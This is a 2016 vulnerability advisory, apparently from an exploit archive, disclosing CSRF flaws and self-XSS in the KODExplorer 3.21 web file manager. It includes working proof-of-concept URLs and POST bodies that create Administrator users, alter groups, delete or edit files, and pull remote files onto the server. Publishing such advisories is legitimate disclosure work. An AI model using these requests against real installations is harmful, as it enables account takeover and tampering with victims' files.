Home / os / winmobile

KODExplorer 3.21 Cross Site Request Forgery

Posted on 07 January 2016

================================================================================ # KODExplorer web file manager - Cross Site Request Foreign ================================================================================ # Vendor Homepage: https://github.com/kalcaddle/KODExplorer/ - http://kalcaddle.com/ # Date: 30-Dec-2015 # Software Link: https://github.com/kalcaddle/KODExplorer/archive/master.zip # Exploit Author : Ben Khlifa Fahmi - Xtnr3v0lt ================================================================================ Description : there is no CSRF token protection on the user management area , an attacker can use the POC bellow to add , edit , remove any user by sending a link to logged in user with User Management privilege # PoC : Add user : http://localhost/index.php?member/add&name=[username]&password=[password]&role=Administrator Delete User: http://localhost/index.php?member/del&name=[username] Edit User: http://localhost/index.php?member/edit&name=[username]&name_to=[new_username]&role_to=[new_group]&password_to=[new_password] Patch released : Check my git https://github.com/benkhlifafahmi/KODExplorer ================================================================================ # Discovered By : Ben Khlifa Fahmi(https://www.benkhlifa.com/) from Tunisian Whitehats Security (@WhitehatsTN) ================================================================================ Special Thanks to both the community Tunisian Whitehats Security and Arab Oracle Users Group Additional CSRF Issues: I - CSRF Group Managment : Description : an attacker can add , remove or edit any User Group by sending an exploit link to a loggeed in admin. Vulnerable Controller : group.class.php Proof of Concept : #Add Group : POST Request action url : http://localhost/index.php?group/add&role=[group name]&name=[group description]&ext_not_allow=[allowed extension(ex: php|jsp|etc..] POSTDATA=explorer%3Amkfile=1&app%3Auser_app=1&explorer%3Amkdir=1&explorer%3ApathRname=1&explorer%3ApathDelete=1&explorer%3ApathInfo=1&explorer%3ApathInfoMuti=1&explorer%3ApathCopy=1&explorer%3ApathCute=1&explorer%3ApathCuteDrag=1&explorer%3Aclipboard=1&explorer%3ApathPast=1&explorer%3Azip=1&explorer%3Aunzip=1&explorer%3Asearch=1&editor%3AfileSave=1&explorer%3AfileUpload=1&explorer%3AserverDownload=1&explorer%3AfileDownload=1&userShare%3Aset=1&userShare%3Adel=1&user%3AchangePassword=1&setting%3Aset=1&fav%3Aedit=1&fav%3Aadd=1&fav%3Adel=1&member%3Aget=1&member%3Aadd=1&member%3Aedit=1&member%3Adel=1&group%3Aget=1&group%3Aadd=1&group%3Aedit=1&group%3Adel=1 #Edit Group : POST Request action url : http://localhost/index.php?group/add&role_old=[group name to edit]&name=[group description]&ext_not_allow=[allowed extension(ex: php|jsp|etc..] POSTDATA=explorer%3Amkfile=1&app%3Auser_app=1&explorer%3Amkdir=1&explorer%3ApathRname=1&explorer%3ApathDelete=1&explorer%3ApathInfo=1&explorer%3ApathInfoMuti=1&explorer%3ApathCopy=1&explorer%3ApathCute=1&explorer%3ApathCuteDrag=1&explorer%3Aclipboard=1&explorer%3ApathPast=1&explorer%3Azip=1&explorer%3Aunzip=1&explorer%3Asearch=1&editor%3AfileSave=1&explorer%3AfileUpload=1&explorer%3AserverDownload=1&explorer%3AfileDownload=1&userShare%3Aset=1&userShare%3Adel=1&user%3AchangePassword=1&setting%3Aset=1&fav%3Aedit=1&fav%3Aadd=1&fav%3Adel=1&member%3Aget=1&member%3Aadd=1&member%3Aedit=1&member%3Adel=1&group%3Aget=1&group%3Aadd=1&group%3Aedit=1&group%3Adel=1 #Delete Group : http://localhost/index.php?group/del&role=[group_name] ------------------------------------------------------------------------ II - CSRF on File Managment : Description : an attacker can add , upload file from external site , delete or edit file/path by sending a link to a logged in administrator. Vulnerable Controller : explorer.class.php Proof of Concept : #Add a file(1) : http://localhost/index.php?explorer/mkfile&path=[file name] #Delete file : POST Request action URL: http://localhost/index.php?explorer/pathDelete post data : list[[{"type":"file","path":"[path to file you want to remove]"}]] #Upload File(2): http://localhost/index.php?explorer/serverDownload&type=download&save_path=[path where to save file]&url=[url to external file]&uuid=[any uuid you want] #Edit file : POST Request action URL:POST http://localhost/index.php?editor/fileSave Post Data: path[path to file] charset[utf-8] filestr[[file content]] ------------------------------------------------------------------------ III - CSRF on App Managment : Description : an attacker can add, edit , remove any app by sending a link to a logged in admin. Vulnerable Controller : app.class.php Proof of Concept : #Add app : POST request action url : http://localhost/index.php?app/add&name=a POST DATA : data[%257B%2522type%2522%253A%2522url%2522%252C%2522content%2522%253A%2522[url of your app]%2522%252C%2522group%2522%253A%2522others%2522%252C%2522name%2522%253A%2522[you app name]%2522%252C%2522desc%2522%253A%2522[you app description]%2522%252C%2522icon%2522%253A%2522oexe.png%2522%252C%2522width%2522%253A%2522800%2522%252C%2522height%2522%253A%2522600%2522%252C%2522simple%2522%253A0%252C%2522resize%2522%253A1%257D] #Delete App : http://localhost/index.php?app/del&name=[your app] ------------------------------------------------------------------------- IV - Multiple Self XSS: Description : the KODExplorer suffer from many Self XSS, vulnerable module to XSS are , Username , App Name , App Source , Folder Name , File Name , Group Name. to execute it just inject html code as one of the vulnerable module above. ------------------------------------------------------------------------- V - Solution : I have released a fix on my github account you can clone it or just wait for a patch to be released on the next version as i have reported all possible vulnerability , ------------------------------------------------------------------------- Thanks : I want to say "thank you" for: - Tunisian Whitehats Security (@WhitehatsTN) http://www.whitehats.tn - Arab Oracle Users Group (@araboug) http://www.araboug.org - @RaisoMos , @tws_bayrem , @tws_charfeddine , @achref_vip , @tws_amine. Special Greetz to my fiancy.

 

TOP